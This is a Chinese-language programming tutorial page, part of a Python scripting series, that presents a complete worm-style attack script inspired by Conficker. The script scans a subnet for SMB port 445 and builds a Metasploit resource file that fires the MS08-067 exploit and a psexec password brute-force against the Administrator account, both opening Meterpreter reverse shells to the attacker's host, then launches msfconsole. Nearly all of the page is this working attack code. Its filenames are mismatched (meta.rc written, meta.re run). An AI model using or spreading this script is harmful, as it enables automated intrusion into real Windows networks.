程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

【Python腳本進階】2.4、conficker蠕蟲(終)

編輯:Python

完整

腳本能掃描可能的目標, 利用MS08_067漏洞, 並通過暴力猜測密碼遠程執行一個進程。


最後, 還要在main()函數中添加一些參數解析代碼,然後調用剛才編寫的那些函數, 以完成腳本的編寫。

import os
import optparse
import sys
import nmap
def findTgts(subNet):
nmScan = nmap.PortScanner()
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print('[+] Found Target Host:' + host)
tgtHosts.append(host)
return tgtHosts
def setupHandler(configFile, lhost, lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('setPAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
configFile.write('setg DisablePayloadHandler 1\n')
def confickerExploit(configFile, tgtHost, lhost, lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi \n')
configFile.write('set RHOST ' +str(tgtHost) +'\n')
configFile.write('set PAYLOAD '+ 'windows/meterpreter/reverse_tcp\n')
configFile. write ('set LPORT ' +str(lport) + '\n')
configFile. write ('set LHOST ' +lhost +'\n')
configFile. write ('exploit -j -z\n')
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
username = 'Administrator'
pF = open( passwdFile, 'r' )
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
def main():
configFile = open('meta.rc', 'w')
parser = optparse.OptionParser('[-] Usage%prog ' + '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address [es]')
parser.add_option('-p', dest='lport', type='string', help='specify the listen port')
parser.add_option('-l', dest='lhost', type = 'string', help='specify the listen address')
parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')
(options, args) = parser.parse_args()
if (options.tgtHost == None) | (options.lhost == None):
print(parser.usage)
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
tgtHosts = findTgts(options.tgtHost)
setupHandler(configFile, lhost, lport)
for tgtHost in tgtHosts:
confickerExploit(configFile, tgtHost, lhost, lport)
if passwdFile != None:
smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
configFile.close()
os.system('msfconsole -r meta.re')
if __name__ == '__main__':
main()

  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved